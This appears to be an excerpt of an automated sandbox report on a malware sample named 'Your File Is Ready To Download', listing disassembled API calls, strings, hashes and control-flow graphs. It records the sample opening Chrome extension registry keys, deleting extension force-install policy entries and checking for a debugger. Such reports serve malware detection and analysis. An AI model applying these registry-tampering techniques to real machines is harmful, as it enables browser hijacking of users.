        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: CreateFile
        • String ID: pu
        • API String ID: 823142352-239814663
        • Opcode ID: 5a8ae33256c79a750b5fb093425a3824e0c777594e8c02a681cee802306f055a
        • Instruction ID: 72a715f5ae2c24f4f3d97b8417feef68ea1d1200c442586a24e03918764c12d0
        • Opcode Fuzzy Hash: 5a8ae33256c79a750b5fb093425a3824e0c777594e8c02a681cee802306f055a
        • Instruction Fuzzy Hash: 96E04FB045A2456EDB258B708C9DB99BB706F12320F044BC5F1319A2E3DA714485CB55
        APIs
        • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb,00000000,000F003F,?), ref: 00911AE6
        Strings
        • SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb, xrefs: 00911ADC
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: Open
        • String ID: SOFTWARE\Google\Chrome\Extensions\jdejdmchbgaciegdmifmnkopbdbfhcfb
        • API String ID: 71445658-2709651783
        • Opcode ID: 7ed379632d815ae99db8a97dcf27fd77424e6db7d69cf0e369c0cc717e474ccd
        • Instruction ID: 0b8cbd543ef007495a7afaa0881316d2f60f409c17a740ebe8db51603bf4fb1d
        • Opcode Fuzzy Hash: 7ed379632d815ae99db8a97dcf27fd77424e6db7d69cf0e369c0cc717e474ccd
        • Instruction Fuzzy Hash: EBE0CD3074815BBFD7254B65484A494BE386F133327184786D631950F6E65004C1C741
        APIs
        • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Google\Chrome\Extensions,00000000,000F003F,?), ref: 00911B64
        Strings
        • SOFTWARE\Google\Chrome\Extensions, xrefs: 00911B5A
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: Open
        • String ID: SOFTWARE\Google\Chrome\Extensions
        • API String ID: 71445658-3566514512
        • Opcode ID: 102c3ea8f3df3f9e49fca1761528333c96e6af319613dca72547c753936d8484
        • Instruction ID: 27d4b7d23906562ffcb1cfdc7db51c3f7088cf16795019bbf5c186cbf6cf491b
        • Opcode Fuzzy Hash: 102c3ea8f3df3f9e49fca1761528333c96e6af319613dca72547c753936d8484
        • Instruction Fuzzy Hash: C1E0C2307D832D76CB344B549C0EBB8F26CAB21721F040158F325684E9EF200AC0CA20
        APIs
        • RegDeleteKeyW.ADVAPI32(?,ExtensionInstallAllowlist), ref: 00911A9F
        • RegDeleteKeyW.ADVAPI32(?,ExtensionInstallForcelist), ref: 00911AB1
        Strings
        • ExtensionInstallForcelist, xrefs: 00911AA5
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: Delete
        • String ID: ExtensionInstallForcelist
        • API String ID: 1035893169-3350561883
        • Opcode ID: 258b3860957b5b028e0e9cd176acf5ef96c64507181a50602e626ed2847b817d
        • Instruction ID: ac1356b7fee7c0b288f03a5407e3e7ae94c8fcf94cb4da5c76523f10f37d2b46
        • Opcode Fuzzy Hash: 258b3860957b5b028e0e9cd176acf5ef96c64507181a50602e626ed2847b817d
        • Instruction Fuzzy Hash: BFD0C265A1E28C2BDB3047384C0C4E87E746E21330B0807C9A530910CDC56088C08612
        APIs
        • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome,00000000,000F003F,?), ref: 00911A74
        • RegDeleteKeyW.ADVAPI32(?,ExtensionInstallForcelist), ref: 00911AB1
        Strings
        • SOFTWARE\Policies\Google\Chrome, xrefs: 00911A6A
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: DeleteOpen
        • String ID: SOFTWARE\Policies\Google\Chrome
        • API String ID: 3632437661-2379338332
        • Opcode ID: 67789ad536bd5741b937c001e1d19f9d465ad69f7b2f8023fc4df7a97cd8f8cb
        • Instruction ID: 1023d7b101ca52780f2a74377414dee0fabd2fea0574d89c76a877b23d10225e
        • Opcode Fuzzy Hash: 67789ad536bd5741b937c001e1d19f9d465ad69f7b2f8023fc4df7a97cd8f8cb
        • Instruction Fuzzy Hash: A3D0C9305086A7ABC3169F755C4E558FE247F12722B688B89E665951E3D72040C1CA82
        APIs
        • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist,00000000,000F003F,?), ref: 00911A13
        • RegDeleteValueW.ADVAPI32(?,0091E694), ref: 00911A3F
        Strings
        • SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, xrefs: 00911A09
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: DeleteOpenValue
        • String ID: SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist
        • API String ID: 2654517830-1523167323
        • Opcode ID: f5395ad63e394e2528943bdfedaf7320e4f340ba47b784ce31c4c86be7542f1c
        • Instruction ID: c4bef86d52065fbf6dcaaf6c4cc1740263aab348a2e32680e753a03688dfc8db
        • Opcode Fuzzy Hash: f5395ad63e394e2528943bdfedaf7320e4f340ba47b784ce31c4c86be7542f1c
        • Instruction Fuzzy Hash: BAD0C9249197ABABD3215B245D4A588FE68BF12322B1847C9A664941E3D72145C1C782

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2191 911200-911206 2192 911208 2191->2192 2193 91120b-911227 RegOpenKeyExW 2191->2193 2192->2193 2194 91120a 2192->2194 2195 911229 2193->2195 2196 91122c-911230 2193->2196 2194->2193 2195->2196 2199 91122b 2195->2199 2197 911232 2196->2197 2198 91125b 2196->2198 2200 911234 2197->2200 2201 911237-911258 RegCreateKeyExW 2197->2201 2202 911260-911266 2198->2202 2203 91125d 2198->2203 2199->2196 2200->2201 2204 911236 2200->2204 2201->2198 2203->2202 2205 91125f 2203->2205 2204->2201 2205->2202
        APIs
        • RegOpenKeyExW.KERNELBASE(?,?,00000000,000F003F,?), ref: 0091121E
        • RegCreateKeyExW.KERNELBASE(00000002,00000000,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00911252
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: CreateOpen
        • String ID:
        • API String ID: 436179556-0
        • Opcode ID: 8fcfdc507e119911e5ccd1e18511b2d2faefe85ab630509917bd3ce2cb1a595f
        • Instruction ID: 05af0b8eddbe043b0f0b6c9885241f13eb04b49ef3bc03174c991678570dc990
        • Opcode Fuzzy Hash: 8fcfdc507e119911e5ccd1e18511b2d2faefe85ab630509917bd3ce2cb1a595f
        • Instruction Fuzzy Hash: 8F015A79B4020DBADB20DAA8DD42FED777CAB45720F208645FB20DA1C1D6709E84DBA5

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2206 9136f1-913702 call 9136c6 ExitProcess
        APIs
        • ___crtCorExitProcess.LIBCMT ref: 009136F9
          • Part of subcall function 009136C6: GetModuleHandleW.KERNEL32(mscoree.dll,?,009136FE,?,?,0091966E,000000FF,0000001E,?,00916479,?,00000001,?,?,00916955,00000018), ref: 009136D0
          • Part of subcall function 009136C6: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009136E0
        • ExitProcess.KERNEL32 ref: 00913702
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: ExitProcess$AddressHandleModuleProc___crt
        • String ID:
        • API String ID: 2427264223-0
        • Opcode ID: 1498e40ff290a5e8df3bdb9ffd26916aa7e440899ee558effcc6a6bd70727aea
        • Instruction ID: 69686d952d36c296c3a05bff801c3697ee92ca5f7542fef8dcb64e25791d7d70
        • Opcode Fuzzy Hash: 1498e40ff290a5e8df3bdb9ffd26916aa7e440899ee558effcc6a6bd70727aea
        • Instruction Fuzzy Hash: 88B09B3110410C7FCB112F11DC0E8893F36DB803E07148010F41805131DF72AED1D6C4

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2321 9148aa-9148cc HeapCreate 2322 9148d0-9148d9 2321->2322 2323 9148ce-9148cf 2321->2323
        APIs
        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 009148BF
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 76543ee0b96d746407232335236805aaf03de6132cb9bb5e04ac633b7f0dda71
        • Instruction ID: 87558c85efee957e1f465754b818f795a958fd116710a78028d0cf35186cd532
        • Opcode Fuzzy Hash: 76543ee0b96d746407232335236805aaf03de6132cb9bb5e04ac633b7f0dda71
        • Instruction Fuzzy Hash: 3AD05EB2A68749AADB205F717C09B663BDC9388799F148436B90CC6150F674C551EA04

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2324 91390d-913919 call 9137e1 2326 91391e-913922 2324->2326
        APIs
        • _doexit.LIBCMT ref: 00913919
          • Part of subcall function 009137E1: __lock.LIBCMT ref: 009137EF
          • Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 00913826
          • Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 0091383B
          • Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 00913865
          • Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 0091387B
          • Part of subcall function 009137E1: __decode_pointer.LIBCMT ref: 00913888
          • Part of subcall function 009137E1: __initterm.LIBCMT ref: 009138B7
          • Part of subcall function 009137E1: __initterm.LIBCMT ref: 009138C7
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: __decode_pointer$__initterm$__lock_doexit
        • String ID:
        • API String ID: 1597249276-0
        • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
        • Instruction ID: 62017cd23bdedc0f09e9bf09734cefdcfa62d940dfb3394ee588bf11159c0da4
        • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
        • Instruction Fuzzy Hash: 2CB092B268020C33DA202542EC03F863A1987C0B60F644020FA0C191E1A9A3AAA18089

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 2327 912039-912044 2329 912046-912047 2327->2329 2330 91204d-91204e 2327->2330 2333 912049-91204e 2329->2333 2334 91204b 2329->2334 2331 912050-91205d Sleep 2330->2331 2332 912052-91205d Sleep 2330->2332 2336 912062 2331->2336 2337 91205f 2331->2337 2332->2336 2332->2337 2333->2331 2333->2332 2335 912064 2334->2335 2345 912069-91206a 2335->2345 2346 911fec 2335->2346 2340 912026-91202d 2336->2340 2337->2336 2341 912061 2337->2341 2340->2335 2343 91202f 2340->2343 2341->2341 2347 912030-912031 2343->2347 2348 912034-912044 GetFileAttributesW 2343->2348 2350 91206c 2345->2350 2351 91206e-912079 Sleep 2345->2351 2346->2336 2349 911fed 2346->2349 2347->2348 2352 912033 2347->2352 2348->2329 2348->2330 2353 911ff2-912021 call 9120f0 2349->2353 2354 911fee-911fef 2349->2354 2350->2351 2355 91207b 2351->2355 2356 91207e-9120b0 call 911270 * 2 2351->2356 2352->2348 2353->2340 2364 912023 2353->2364 2354->2353 2357 911ff1 2354->2357 2355->2356 2359 91207d 2355->2359 2367 9120b2 2356->2367 2368 9120b5-9120c0 Sleep 2356->2368 2357->2353 2359->2356 2364->2340 2366 912025 call 9121e2 2364->2366 2366->2340 2367->2368 2370 9120b4 2367->2370 2371 9120c2 2368->2371 2372 9120c5-9120d6 call 911330 2368->2372 2370->2368 2371->2372 2373 9120c4 2371->2373 2376 9120d8 2372->2376 2377 9120db-9120ed call 91213c 2372->2377 2373->2372 2376->2377 2379 9120da-912297 2376->2379 2383 912298 2379->2383 2383->2383 2384 91229a-9122a3 2383->2384
        APIs
        • Sleep.KERNELBASE(0000012C), ref: 00912057
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: f62dbeef4bbc55b42af33e655015597f79bab1471369a39589f70a424e9e3008
        • Instruction ID: 09174964305354d452d75e6298ab6c9f593c1c8c261d2e875ff513359bf78017
        • Opcode Fuzzy Hash: f62dbeef4bbc55b42af33e655015597f79bab1471369a39589f70a424e9e3008
        • Instruction Fuzzy Hash: E2D0A921B1858C8E8E293B7408081BE3908AE3E334B198B94E032C40F2AB0588E4E936
        APIs
        • IsDebuggerPresent.KERNEL32 ref: 009125B7
        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009125CC
        • UnhandledExceptionFilter.KERNEL32(0091B178), ref: 009125D7
        • GetCurrentProcess.KERNEL32(C0000409), ref: 009125F3
        • TerminateProcess.KERNEL32(00000000), ref: 009125FA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
        • String ID: FzFW
        • API String ID: 2579439406-2507217327
        • Opcode ID: 96ed47605eec6e700a2bf70779bd93e1c8a971c25f850c003bb20a399c4e7352
        • Instruction ID: 64025f29119e78d40a9d20e33c3b870ac2f01e92a9137658e542662514a7deaf
        • Opcode Fuzzy Hash: 96ed47605eec6e700a2bf70779bd93e1c8a971c25f850c003bb20a399c4e7352
        • Instruction Fuzzy Hash: 0621F6BAA2A204DFD321EF26FD456943BB0BB4C350F02801AE50887361D37459C2EF46
        APIs
        • SetUnhandledExceptionFilter.KERNEL32(Function_0000361D), ref: 00913664
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: 9df98c6058d4f1a4da6ea6de8967bcee00257ecf4208033630a864d426415ea0
        • Instruction ID: 0433cab4978b44c35def1c9c6a8e03a5b3e1c74196139e0b22595d55902f4a7f
        • Opcode Fuzzy Hash: 9df98c6058d4f1a4da6ea6de8967bcee00257ecf4208033630a864d426415ea0
        • Instruction Fuzzy Hash: 729002603771085A8E0067705C4E69A25B16ADC78A74184606012D4168EB504140AD11
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 074dbd7a17795516e2566a0e2371abc3458dd9c8ec59c144762027a1070d0397
        • Instruction ID: f6ba89223237782915f455612d99c7f58c16a5e5bc51a35dd3b61659f7342ff9
        • Opcode Fuzzy Hash: 074dbd7a17795516e2566a0e2371abc3458dd9c8ec59c144762027a1070d0397
        • Instruction Fuzzy Hash: D5F02471A4030D5BC7215EACA8010EDB7ECEA01720BC44759D2A8C36E1E2319C808B65
        APIs
        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0091C488,0000000C,009145AF,00000000,00000000,?,00000000,0091290A,00912B28), ref: 00914486
        • __crt_waiting_on_module_handle.LIBCMT ref: 00914491
          • Part of subcall function 0091366D: Sleep.KERNEL32(000003E8,00000000,?,009143D7,KERNEL32.DLL,?,00914423,?,00000000,0091290A,00912B28), ref: 00913679
          • Part of subcall function 0091366D: GetModuleHandleW.KERNEL32(?,?,009143D7,KERNEL32.DLL,?,00914423,?,00000000,0091290A,00912B28), ref: 00913682
        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 009144BA
        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 009144CA
        • __lock.LIBCMT ref: 009144EC
        • InterlockedIncrement.KERNEL32(0091D520), ref: 009144F9
        • __lock.LIBCMT ref: 0091450D
        • ___addlocaleref.LIBCMT ref: 0091452B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
        • API String ID: 1028249917-2843748187
        • Opcode ID: 569ad069b3fb11aa6617e4ba7764f0559f95685d38a6ccf8c75e9da444ef1987
        • Instruction ID: 4931ca00ef43cf1b1c989f3702212b2012412c35484d440173f5bbff2f91fe07
        • Opcode Fuzzy Hash: 569ad069b3fb11aa6617e4ba7764f0559f95685d38a6ccf8c75e9da444ef1987
        • Instruction Fuzzy Hash: 41119371B05709DFD7209F79D801BDABBE5AF88714F108519F0A9962A1CB709980DF54
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: __isctype_l
        • String ID: $$+$-$0$0
        • API String ID: 2565520105-4042548909
        • Opcode ID: c2ea9eda637965537a1dbed6b3cb2b2401e766686af65546a3617ba465071f82
        • Instruction ID: 01fefd3eb4bae002fe8d53b8ee8e614a51648bb66a2591142291dcdefe52df12
        • Opcode Fuzzy Hash: c2ea9eda637965537a1dbed6b3cb2b2401e766686af65546a3617ba465071f82
        • Instruction Fuzzy Hash: 2861ED30B4424ECAEF25CF18D5A53EA7BE9AF12314F28019AD8D59A191C3748ED5C791
        APIs
        • __getptd.LIBCMT ref: 00915A5C
          • Part of subcall function 009145D4: __getptd_noexit.LIBCMT ref: 009145D7
          • Part of subcall function 009145D4: __amsg_exit.LIBCMT ref: 009145E4
        • __amsg_exit.LIBCMT ref: 00915A7C
        • __lock.LIBCMT ref: 00915A8C
        • InterlockedDecrement.KERNEL32(?), ref: 00915AA9
        • InterlockedIncrement.KERNEL32(02662D98), ref: 00915AD4
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
        • String ID:
        • API String ID: 4271482742-0
        • Opcode ID: 8d6fc235c2d12d2e7c632388e264d28a14dde6d4b36e59695cb442ed6be760ac
        • Instruction ID: f9697620f14bcf5610ed6bd8ef670e299d7ab2667b07a13f2da989fbb5f7c659
        • Opcode Fuzzy Hash: 8d6fc235c2d12d2e7c632388e264d28a14dde6d4b36e59695cb442ed6be760ac
        • Instruction Fuzzy Hash: 6001AD32B46B19EBCB21AB6498467D97764AFC4720F0B8205F814A7681C77469C1DFD1
        APIs
        • __lock.LIBCMT ref: 009163D7
          • Part of subcall function 009169CB: __mtinitlocknum.LIBCMT ref: 009169E1
          • Part of subcall function 009169CB: __amsg_exit.LIBCMT ref: 009169ED
          • Part of subcall function 009169CB: EnterCriticalSection.KERNEL32(?,?,?,00919780,00000004,0091C700,0000000C,009164C3,?,?,00000000,00000000,00000000,?,00914586,00000001), ref: 009169F5
        • ___sbh_find_block.LIBCMT ref: 009163E2
        • ___sbh_free_block.LIBCMT ref: 009163F1
        • HeapFree.KERNEL32(00000000,?,0091C578,0000000C,009169AC,00000000,0091C5B8,0000000C,009169E6,?,?,?,00919780,00000004,0091C700,0000000C), ref: 00916421
        • GetLastError.KERNEL32(?,00919780,00000004,0091C700,0000000C,009164C3,?,?,00000000,00000000,00000000,?,00914586,00000001,00000214), ref: 00916432
        Memory Dump Source
        • Source File: 00000000.00000002.11892442470.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
        • Associated: 00000000.00000002.11892423777.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892460672.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.11892508182.000000000092D000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_910000_Your File Is Ready To Download.jbxd
        Similarity
        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
        • String ID:
        • API String ID: 2714421763-0
        • Opcode ID: 5bb09631857f851e105238e40bf99053055f517b5dbf2f00cf5b28b2874e967c
        • Instruction ID: 713ed57bd352188dc3737387759a648a4cf016d126dfc177895a50e4f3136068
